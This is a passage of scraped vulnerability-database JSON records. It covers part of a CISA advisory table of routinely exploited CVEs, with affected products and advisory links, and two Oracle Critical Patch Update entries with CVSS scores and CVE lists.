CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523> \"Microsoft Exchange Server Elevation of Privilege Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities](<https://www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities> \"Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities\" ) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )\n\n| \n\nJira Atlassian\n\n| \n\nConfluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n| \n\n[Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940> \"Confluence Server Webwork OGNL injection - CVE-2021-26084\" )\n\n| \n\nCISA Alert:\n\n[Atlassian Releases Security Updates for Confluence Server and Data Center](<https://www.cisa.gov/news-events/alerts/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data-center> \"Atlassian Releases Security Updates for Confluence Server and Data Center\" ) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )\n\n| \n\nZoho ManageEngineCorp.\n\n| \n\nManageEngine ADSelfService Plus builds up to 6113\n\n| \n\n[Security advisory - ADSelfService Plus authentication bypass vulnerability](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html> \"Security advisory - ADSelfService Plus authentication bypass vulnerability\" )\n\n| \n\nACSC Alert:\n\n[Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors](<https://www.cyber.gov.au/about-us/alerts/critical-vulnerability-manageengine-adselfservice-plus-exploited-cyber-actors> \"Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors\" ) \n \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438> \"CVE-2021-40438\" )\n\n| \n\nApache\n\n| \n\nHTTP Server 2.4.48\n\n| | \n \n[CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \"CVE-2021-41773\" )\n\n| \n\nApache\n\n| \n\nApache HTTP Server 2.4.49\n\n| \n\n[Apache HTTP Server 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html> \"Apache HTTP Server 2.4 vulnerabilities\" )\n\n| \n \n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013> \"CVE-2021-42013\" )\n\n| \n\nApache\n\n| \n\nApache HTTP Server 2.4.50\n\n| \n\n[Apache HTTP Server 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html> \"Apache HTTP Server 2.4 vulnerabilities\" )\n\n| \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038> \"CVE-2021-20038\" )\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24svSMA 100 series appliances\n\n| \n\n[SonicWall patches multiple SMA100 affected vulnerabilities](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026> \"SONICWALL PATCHES MULTIPLE SMA100 AFFECTED VULNERABILITIES\" )\n\n| \n\nACSC Alert:\n\n[Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)\n\n_CCCS Alert:_\n\n[SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4> \"SonicWall security advisory\" ) \n \n[CVE-2021- 44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )\n\n| \n\nApache\n\n| \n\nLog4j, all versions from 2.0-beta9 to 2.14.1\n\n[For other affected vendors and products, see CISA's GitHub repository.](<https://github.com/cisagov/log4j-affected-db>)\n\n| \n\n[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html> \"Apache Log4j Security Vulnerabilities\" )\n\nFor additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a> \"Mitigating Log4Shell and Other Log4j-Related Vulnerabilities\" )\n\n| \n\nCISA webpage:\n\n[Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance> \"Apache Log4j Vulnerability Guidance\" )\n\n_CCCS Alert:_\n\n[Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability> \"Alert - Active exploitation of Apache Log4j vulnerability - update 7\" )\n\nACSC Advisory:\n\n[2021-007: Log4j vulnerability \u2013 advice and mitigations](<https://www.cyber.gov.au/about-us/advisories/2021-007-log4j-vulnerability-advice-and-mitigations> \"2021-007: Log4j vulnerability \u2013 advice and mitigations\" )\n\nACSC Publication:\n\n[Log4j: What Boards and Directors Need to Know](<https://www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/log4j-what-boards-and-directors-need-know> \"Log4j: What Boards and Directors Need to Know\" ) \n \n[CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046> \"CVE-2021-45046\" )\n\n| \n\nApache\n\n| \n\nLog4j 2.15.0Log4j\n\n| \n\n[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html> \"Apache Log4j Security Vulnerabilities\" )\n\n| \n \n[CVE-2022-42475](<https://nvd.nist.gov/vuln/detail/CVE-2022-42475> \"CVE-2022-42475\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and\n\nFortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier\n\n| \n\n[FortiOS - heap-based buffer overflow in sslvpnd](<https://www.fortiguard.com/psirt/FG-IR-22-398> \"FortiOS - heap-based buffer overflow in sslvpnd\" )\n\n| \n \n[CVE-2022-24682](<https://nvd.nist.gov/vuln/detail/CVE-2022-24682> \"CVE-2022-24682\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) Collaboration Suite\n\n| \n\n[Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P30> \"Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release\" )\n\n| \n \n[CVE-2022-22536 ](<https://nvd.nist.gov/vuln/detail/CVE-2022-22536> \"CVE-2022-22536\" )\n\n| \n\nSAP\n\n| \n\nNetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM)\n\n| \n\n[Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher](<https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/> \"Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher\" )\n\n| \n\nCISA Alert:\n\n[Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)](<https://www.cisa.gov/news-events/alerts/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing> \"Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager \\(ICM\\)\" ) \n \n[CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963> \"CVE-2022-22963\" )\n\n| \n\nVMware Tanzumware Tanzu\n\n| \n\nSpring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions\n\n| \n\n[CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression](<https://spring.io/security/cve-2022-22963> \"CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression\" )\n\n| \n \n[CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n\nIdentity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3\n\nvRealize Automation (vIDM), 8.x, 7.6\n\nVMware Cloud Foundation (vIDM), 4.x\n\nvRealize Suite Lifecycle Manager (vIDM), 8.xWorkspace\n\nONE Access and Identity Manager\n\n| \n\n[VMware Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html> \"VMSA-2022-0011\" )\n\n| \n \n[CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n\nIdentity Manager (vIDM) and vRealize Automation3.3.6, 3.3.5, 3.3.4, 3.3.3\n\nvRealize Automation (vIDM), 8.x, 7.6\n\nVMware Cloud Foundation (vIDM), 4.x\n\nVMware Cloud Foundation (vRA), 3.x\n\nvRealize Suite Lifecycle Manager (vIDM), 8.x\n\n| \n\n[VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html> \"VMSA-2022-0011\" )\n\n| \n \n[CVE-2022-29464](<https://nvd.nist.gov/vuln/detail/CVE-2022-29464> \"CVE-2022-29464\" )\n\n| \n\nAtlassianWSO2\n\n| \n\nWSO2 API Manager 2.2.0 and above through 4.0.0\n\nWSO2 Identity Server 5.2.0 and above through 5.11.0 \n\nWSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0\n\nWSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0\n\nWSO2 Enterprise Integrator 6.2.0 and above through 6.6.0\n\n| \n\n[WSO2 Documentation - Spaces](<https://wso2docs.atlassian.net/wiki/spaces> \"Spaces\" )\n\n| \n \n[CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924> \"CVE-2022-27924\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite, 8.8.15 and 9.0\n\n| \n\n[Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1#Security_Fixes> \"Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release\" )\n\n| \n \n[CVE-2022-1388](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )\n\n| \n\nF5 Networks\n\n| \n\nF5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions\n\n| \n\n[K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388](<https://my.f5.com/manage/s/article/K23605346> \"K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388\" )\n\n| \n\nJoint CSA:\n\n[Threat Actors Exploiting F5 BIG-IP CVE-2022-1388](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a> \"Threat Actors Exploiting F5 BIG-IP CVE-2022-1388\" ) \n \n[CVE-2022-30190](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| | \n\nCISA Alert:\n\n[Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability](<https://www.cisa.gov/news-events/alerts/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability> \"Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability\" ) \n \n[CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047> \"CVE-2022-22047\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047> \"Windows Client Server Run-time Subsystem \\(CSRSS\\) Elevation of Privilege Vulnerability\" )\n\n| \n \n[CVE-2022-27593](<https://nvd.nist.gov/vuln/detail/CVE-2022-27593> \"CVE-2022-27593\" )\n\n| \n\nQNAP\n\n| \n\nCertain QNAP NAS running Photo Station with internet exposure Ausustor Network Attached Storage\n\n| \n\n[DeadBolt Ransomware](<https://www.qnap.com/en/security-advisory/qsa-22-24> \"DeadBolt Ransomware\" )\n\n| \n \n[CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082> \"CVE-2022-41082\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nACSC Alert:\n\n[Vulnerability Alert \u2013 2 new Vulnerabilities associated with Microsoft Exchange.](<https://www.cyber.gov.au/about-us/alerts/vulnerability-alert-2-new-vulnerabilities-associated-microsoft-exchange> \"Vulnerability Alert \u2013 2 new Vulnerabilities associated with Microsoft Exchange.\" ) \n \n[CVE-2022-40684](<https://nvd.nist.gov/vuln/detail/CVE-2022-40684> \"CVE-2022-40684\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0\n\n| \n\n[FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface](<https://www.fortiguard.com/psirt/FG-IR-22-377> \"FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface\" )\n\n| \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-03T12:00:00", "type": "ics", "title": "2022 Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-13379", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-5902", "CVE-2021-20016", "CVE-2021-20021", "CVE-2021-20038", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40438", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-44228", "CVE-2021-45046", "CVE-2022-1388", "CVE-2022-22047", "CVE-2022-22536", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22963", "CVE-2022-24682", "CVE-2022-26134", "CVE-2022-27593", "CVE-2022-27924", "CVE-2022-29464", "CVE-2022-30190", "CVE-2022-40684", "CVE-2022-41082", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2023-08-03T12:00:00", "id": "AA23-215A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2023-09-30T02:41:45", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 349 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2880220.1>).\n\n**Please note that since the release of the April 2022 Critical Patch Update, Oracle has released a Security Alert for Oracle E-Business Suite [CVE-2022-21500 (May 19, 2022)](<https://www.oracle.com/security-alerts/alert-cve-2022-21500.html>). Customers are strongly advised to apply the July 2022 Critical Patch Update for Oracle E-Business Suite, which includes patches for this Alert as well as additional patches.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1259", "CVE-2018-1273", "CVE-2018-1274", "CVE-2018-18074", "CVE-2018-25032", "CVE-2018-8032", "CVE-2019-0219", "CVE-2019-0220", "CVE-2019-0227", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-17495", "CVE-2019-17571", "CVE-2019-20916", "CVE-2019-9636", "CVE-2019-9740", "CVE-2020-0404", "CVE-2020-10683", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11987", "CVE-2020-13974", "CVE-2020-14343", "CVE-2020-1747", "CVE-2020-17521", "CVE-2020-1927", "CVE-2020-25649", "CVE-2020-26137", "CVE-2020-26184", "CVE-2020-26185", "CVE-2020-26237", "CVE-2020-27619", "CVE-2020-27820", "CVE-2020-28052", "CVE-2020-28491", "CVE-2020-28500", "CVE-2020-29396", "CVE-2020-29505", "CVE-2020-29506", "CVE-2020-29507", "CVE-2020-29508", "CVE-2020-29651", "CVE-2020-35163", "CVE-2020-35164", "CVE-2020-35166", "CVE-2020-35167", "CVE-2020-35168", "CVE-2020-35169", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36518", "CVE-2020-4788", "CVE-2020-5258", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-7656", "CVE-2020-7712", "CVE-2020-9484", "CVE-2020-9492", "CVE-2021-20322", "CVE-2021-21781", "CVE-2021-22118", "CVE-2021-22119", "CVE-2021-22931", "CVE-2021-22939", "CVE-2021-22940", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23337", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23926", "CVE-2021-26291", "CVE-2021-29154", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-31684", "CVE-2021-3177", "CVE-2021-31805", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-33560", "CVE-2021-33813", "CVE-2021-34141", "CVE-2021-34429", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-35043", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-3572", "CVE-2021-35940", "CVE-2021-36090", "CVE-2021-3612", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3672", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37159", "CVE-2021-3737", "CVE-2021-3743", "CVE-2021-3744", "CVE-2021-3749", "CVE-2021-3752", "CVE-2021-37714", "CVE-2021-3772", "CVE-2021-3773", "CVE-2021-37750", "CVE-2021-38153", "CVE-2021-38296", "CVE-2021-38604", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-4002", "CVE-2021-40690", "CVE-2021-4083", "CVE-2021-4104", "CVE-2021-4115", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-41303", "CVE-2021-41495", "CVE-2021-41496", "CVE-2021-4157", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-41771", "CVE-2021-41772", "CVE-2021-4197", "CVE-2021-4203", "CVE-2021-42340", "CVE-2021-42575", "CVE-2021-42739", "CVE-2021-43389", "CVE-2021-43396", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-43976", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44832", "CVE-2021-45485", "CVE-2021-45486", "CVE-2021-45943", "CVE-2022-0001", "CVE-2022-0002", "CVE-2022-0286", "CVE-2022-0322", "CVE-2022-0778", "CVE-2022-0839", "CVE-2022-1011", "CVE-2022-1154", "CVE-2022-1271", "CVE-2022-1292", "CVE-2022-21428", "CVE-2022-21429", "CVE-2022-21432", "CVE-2022-21439", "CVE-2022-21455", "CVE-2022-21500", "CVE-2022-21508", "CVE-2022-21509", "CVE-2022-21510", "CVE-2022-21511", "CVE-2022-21512", "CVE-2022-21513", "CVE-2022-21514", "CVE-2022-21515", "CVE-2022-21516", "CVE-2022-21517", "CVE-2022-21518", "CVE-2022-21519", "CVE-2022-21520", "CVE-2022-21521", "CVE-2022-21522", "CVE-2022-21523", "CVE-2022-21524", "CVE-2022-21525", "CVE-2022-21526", "CVE-2022-21527", "CVE-2022-21528", "CVE-2022-21529", "CVE-2022-21530", "CVE-2022-21531", "CVE-2022-21532", "CVE-2022-21533", "CVE-2022-21534", "CVE-2022-21535", "CVE-2022-21536", "CVE-2022-21537", "CVE-2022-21538", "CVE-2022-21539", "CVE-2022-21540", "CVE-2022-21541", "CVE-2022-21542", "CVE-2022-21543", "CVE-2022-21544", "CVE-2022-21545", "CVE-2022-21547", "CVE-2022-21548", "CVE-2022-21549", "CVE-2022-21550", "CVE-2022-21551", "CVE-2022-21552", "CVE-2022-21553", "CVE-2022-21554", "CVE-2022-21555", "CVE-2022-21556", "CVE-2022-21557", "CVE-2022-21558", "CVE-2022-21559", "CVE-2022-21560", "CVE-2022-21561", "CVE-2022-21562", "CVE-2022-21563", "CVE-2022-21564", "CVE-2022-21565", "CVE-2022-21566", "CVE-2022-21567", "CVE-2022-21568", "CVE-2022-21569", "CVE-2022-21570", "CVE-2022-21571", "CVE-2022-21572", "CVE-2022-21573", "CVE-2022-21574", "CVE-2022-21575", "CVE-2022-21576", "CVE-2022-21577", "CVE-2022-21578", "CVE-2022-21579", "CVE-2022-21580", "CVE-2022-21581", "CVE-2022-21582", "CVE-2022-21583", "CVE-2022-21584", "CVE-2022-21585", "CVE-2022-21586", "CVE-2022-21824", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-22969", "CVE-2022-22970", "CVE-2022-22971", "CVE-2022-22976", "CVE-2022-22978", "CVE-2022-23181", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23308", "CVE-2022-23437", "CVE-2022-23457", "CVE-2022-23632", "CVE-2022-23772", "CVE-2022-23773", "CVE-2022-23806", "CVE-2022-24329", "CVE-2022-24407", "CVE-2022-24728", "CVE-2022-24729", "CVE-2022-24735", "CVE-2022-24736", "CVE-2022-24801", "CVE-2022-24823", "CVE-2022-24839", "CVE-2022-24891", "CVE-2022-25169", "CVE-2022-25636", "CVE-2022-25647", "CVE-2022-25762", "CVE-2022-25845", "CVE-2022-27778", "CVE-2022-29577", "CVE-2022-29824", "CVE-2022-29885", "CVE-2022-30126", "CVE-2022-34169"], "modified": "2022-10-31T00:00:00", "id": "ORACLE:CPUJUL2022", "href": "https://www.oracle.com/security-alerts/cpujul2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-30T02:41:46", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 520 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2857016.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353", "CVE-2017-14159", "CVE-2017-17740", "CVE-2017-9287", "CVE-2018-1000067", "CVE-2018-1000068", "CVE-2018-1000192", "CVE-2018-1000193", "CVE-2018-1000194", "CVE-2018-1000195", "CVE-2018-11212", "CVE-2018-1285", "CVE-2018-1999001", "CVE-2018-1999002", "CVE-2018-1999003", "CVE-2018-1999004", "CVE-2018-1999005", "CVE-2018-1999007", "CVE-2018-2601", "CVE-2018-6356", "CVE-2018-8032", "CVE-2019-0227", "CVE-2019-1003049", "CVE-2019-1003050", "CVE-2019-10086", "CVE-2019-10247", "CVE-2019-10383", "CVE-2019-10384", "CVE-2019-12086", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-13038", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-14822", "CVE-2019-14862", "CVE-2019-16785", "CVE-2019-16786", "CVE-2019-16789", "CVE-2019-16792", "CVE-2019-17195", "CVE-2019-17571", "CVE-2019-18218", "CVE-2019-18276", "CVE-2019-19603", "CVE-2019-20388", "CVE-2019-20838", "CVE-2019-20916", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-3799", "CVE-2019-5827", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10693", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", 